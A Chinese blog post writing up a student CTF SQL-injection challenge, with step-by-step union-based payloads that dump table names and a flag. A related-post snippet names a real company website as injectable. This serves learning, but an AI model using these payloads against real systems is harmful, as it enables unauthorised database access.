CTF-web题之简单的SQL注入

最新推荐文章于 2025-07-28 15:51:45 发布
原创 最新推荐文章于 2025-07-28 15:51:45 发布 · 5.5k 阅读 · 21 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#unctf #web #sql #网络安全

本文详细解析了一道网络安全大赛中的SQL注入题目,通过逐步逻辑推断,揭示了如何利用SQL技巧获取数据库信息,包括字段数判断、数据回显分析、功能函数调用和最终数据获取。

这两天闲着没事报名了学校信安和网安组织的网络安全大赛,靠着仅有的一点web知识做了几道web题,现在记录一下其中一道sql注入题的解题思路

首先题面如下

在这里插入图片描述

首先通过语句判断有多少个字段

1' or 1=1 order by 4 #
1' or 1=1 order by 3 #

order by是按by后面的数字或字段名所在列进行排序,如果结果集只有3列,order by4则会报错,故可以用来判断结果集的字段数

第一条语句报错,第二条语句返回

admin
5ef582761f2cafceebdfc8c9ac259cf0

可以得出改表中有三个字段,而显示结果只有两个,且可以看出显示的应该是用户名和密码

之所以要查出有多少个字段,是为了判断结果集中有多少信息(因为页面不会把所有查到的信息显示出来),且我们union select要求两次查询的结果集拥有相同的列数

通过union select确定回显在页面的是哪几行的数据

-1' union select 1,2,3 #

select 1,2,3(可以是其他数字或字符等)会返回一行与select内容对应的结果,且字段名也保持相同

以下为select 2,3,4返回的结果集

在这里插入图片描述

union select 1,2,3会返回一行数据,我们即可以通过页面上现实的具体数字来判断页面回显的是哪几行的数据,

uion前需要写一个结果集中不存在的数据(随便猜一下就行),因为如果填写admin的话,会查出来一行结果,而union select是将两次查询的结果集合并成(列数不变,增加行数),在页面只显示一行结果的情况下,则无法看到select 1,2,3返回的结果

上述结果返回

2,3

说明页面回显的是结果集中第二三行的数据

那么我们可以通过union select在第二三个数字的位置换成一些函数来获取信息,如:

-1' union select 1,2,database() #

则返回

2,babysql

显然babysql就是正在查询的数据库名

数据库名后则可以查数据库中存在的数据表

-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='babysql')#

group_concat()将group by产生的相同分组的值连接成一个字符串(原本是分行显示),才使得查询结果能一并显示出来

则返回

2
user,flag

有表名后即可查表中的字段名,显然flag藏在flag表中

-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='babysql' and table_name='flag')#

则返回

2
user,flag

最后查询flag表中字段名为flag的结果,即可得到flag

-1' union select 1,2,(select group_concat(flag) from flag)#

大功告成!

一道简单sql注入
weixin_44215027的博客
11-05 2161
一道简单sql注入目 好久都没有做ctf目了,最近又重新开始回顾了。首先是sql注入。这是一道简单的整数型注入目。 首先,进入网址:http://www.kabelindo.co.id/index.php 刚开始我以为是搜索框注入,然后我发现我错了。。。。 但是,我看到了news: 这就非常的舒服,进入后果然有一个注入点 加一个单引号,会报错。加 and 1=1,不会报错。说明是一...
CTFHub~SQL注入简单详细教程
weixin_67832625的博客
08-14 2936
本文主要是对CTFHub靶场的SQL注入做了详细的教程讲解,让练习者对SQL注入有更详细的了解和深入,如有什么问,随时联系作者
CTF-Web学习笔记——简单SQL注入(一)
weixin_55914379的博客
01-07 1161
SQL注入简单手注
SQL注入的相关例ctfhub)
2401_82388450的博客
04-01 1465
SQL注入
Pvr1sC的博客
03-17 986
极客大挑战2019 EasySQL 简单,'发现注入点 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 写入1’ or 1=1 # [强网杯 2019]随便注 堆叠注入sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以
CTF-Web学习笔记:SQL注入
最新发布
Deng7326的博客
07-28 1382
本文系统梳理了CTF竞赛中SQL注入的核心原理与实战技巧。首先介绍了SQL注入的基础概念和成因,即用户输入数据被直接拼接到SQL语句中执行。其次分类解析了CTF常见的注入类型,包括数字/字符串型注入、报错/盲注/联合查询等攻击方式。文章重点分享了实战经验:如何判断注入点、确定数据库类型、使用工具辅助及绕过WAF防御。最后通过一道报错注入目,详细演示了从数据库名获取到最终拿Flag的完整解流程,并推荐了SQLiLabs等练习平台。
CTF---Web---SQL注入---05---MongoDB+宽字节注入
qq_22160557的博客
07-29 1067
文章目录前言一、目描述二、解步骤1、分析传入参数2、判断注入方式3、宽字节注入三、总结 前言 目分类: CTFWebSQL注入—05—MongoDB+宽字节注入 一、目描述 目:研究生的秘密 二、解步骤 1、分析传入参数 Step1:http://192.168.87.173/index.php?title=Mysql%20%E6%95%99%E7%A8%8B ,查看源代码,,只有title的值等于页面的参数时,content才有内容 2、判断注入方式 Step2:当title=1
CTF---Web---SQL注入---07---注入点+level
qq_22160557的博客
07-31 621
文章目录前言一、目描述二、解步骤1、寻找注入点2、请求包保存3、sqlmap爆破三、总结 前言 目分类: CTFWebSQL注入—07—注入点+level 一、目描述 目:添加备注 二、解步骤 1、寻找注入点 Step1:本在常规注入的地方,是无法注入的:但是这是下面有个添加备注的地方 2、请求包保存 Step2:添加备注后,抓包后,保存为txt文件 3、sqlmap爆破 Step3:丢到sqlmap中跑就行了。 注入点为id,注入类型为以时间为基础的时间盲注。 Step4:爆
CTF---Web---SQL注入---03---联合注入+关键字过滤
qq_22160557的博客
07-29 1089
文章目录前言一、目描述二、解步骤1、回显判断注入方式2、尝试列数3、寻找注入点4、尝试注入(库,表,列,字段)三、总结 前言 目分类: CTFWebSQL注入—03—联合注入+关键字过滤 一、目描述 目:SQL注入 链接:http://192.168.87.175 二、解步骤 1、回显判断注入方式 Step1: http://192.168.87.175/viewld.do?ldid=2,回显正常。有内容 Step2: http://192.168.87.175/viewld.do?ld
CTF---Web---SQL注入---02---sqlmap常规模式
qq_22160557的博客
07-29 586
文章目录前言一、目描述二、解步骤1、id查询2、sqlmap跑URL总结 前言 目分类: CTFWebSQL注入—02—sqlmap常规模式 一、目描述 目:sql注入 链接:192.168.87.184 提示:order 二、解步骤 1、id查询 Step1:根据id查询一下,url变成了 http://192.168.87.184/?order=id&button=submit 由链接可知,此为get传参。 2、sqlmap跑URL Step2:利用kali中的sqlma
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
CTF总结(1------简单SQL注入
qq_45047250的博客
04-25 1574
第一次写分享类的文章,有错误的地方还请大家多多指正哈!此篇文章主要分享一些刷web目中会遇到的一些知识点,之后还会继续分享一些关于这方面的知识。 文章目录简单sql注入预备知识注入前判断如何判断注入顺序及操作总结 简单sql注入 预备知识 schema:可以代表数据库的组织和结构,其中schema和schemata的模式可以是表、列、数据类型、关系、主键等等。下面会通过例子来说明,大家可以自行体会。 information_schema: 是MySQL自带的信息数据库,用于存储数据库元数据(例如:数
简单SQL注入(内含sqli less-2例
m0_73902453的博客
07-21 1158
我们先对下列语句进行分析,table_name指的是表名,我们需要查询的地方,从information_schema.tables这个表进行查询,这里的.呢代表的是information_schema系统库的下一级,也就是表这一级,因为这个网站查询出来的所有表可能有成百上千个,所以where table_schema='security'这个语句的作用就是定点查询security这个库下的表,因为我们前面已知我们要查询的库名为security。注释符混用,等价函数替换,特殊符号混用,等其他。
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
2401_84973202的博客
05-11 2786
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.youkuaiyun.com/m0_73734159/article/details/134450773。
记一次sql注入
BerL1n
11-25 419
前言 前几天在做上海赛中碰到一道sql注入,很简单的一道,过滤的也都fuzz出来了,绕过方法也找到了,还是没做出来,因为不能有单引号,一出现单引号就404,fuzz到其他敏感字都是提示禁用的,就是单引号会404,赛后看payload也是有单引号的,emmm…可能还是自己payload没写好吧。。原谅注入学的最菜的我,这里小记一下吧。 例 通过一道目记下思路和过程。 目输入内容,然后可以...
CTF-实验吧简单sql注入
才不是小弱鸡的博客
05-07 1756
好吧,其实这我也是看了wp才知道的写wp的老哥个个都是人才,脑洞很大,知识丰富,还会嘤嘤嘤,我超喜欢的。咳咳咳,跑了,这一看就是sql注入嘛(别问我为什么知道,自己看目名)先进行过滤测试。先试试1 and 1=1,发现返回显然and被过滤了然后继续测试,结果发现sql语句基本上都被过滤了QAQ看wp发现这里其实是过滤后面带有空格的关键字了解这个就可以开始愉快的注入了先查一下数据库 1'/*...
sql注入简单例子(非常详细),零基础入门到精通,看这一篇就够了
weixin_51725318的博客
11-14 5469
sql注入简单例子(非常详细),零基础入门到精通,看这一篇就够了
CTF-SQL注入入门
PolarPeak的博客
12-14 6689
CTF SQL注入
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1(SQL注入之布尔盲注)
m0_73734159的博客
12-09 1863
在进行布尔盲注攻击时,攻击者首先需要对目标应用程序进行SQL注入,然后根据页面返回的结果来判断注入是否成功。布尔注入是一种常见的SQL注入攻击技术,攻击者通过构造恶意输入,使应用程序的SQL查询返回不同的结果,从而达到绕过应用程序的安全机制,获取未授权的信息或执行恶意操作的目的。总之,布尔盲注是一种比较复杂的SQL注入攻击方式,需要攻击者具备一定的技术水平和耐心。这种攻击方式主要利用Web页面的返回结果,根据页面返回的True或者是False来得到数据库中的相关信息。可知是字符型的布尔注入(盲注)
PHP在CTF-Web挑战中的实战应用技巧
这涉及到许多方面,包括但不限于防止SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)、文件包含、会话劫持、目录遍历、服务端请求伪造(SSRF)等。在CTF挑战中,经常会出现模拟这些攻击的环节,以考验参赛者的安全...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

得过且过的勇者y

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值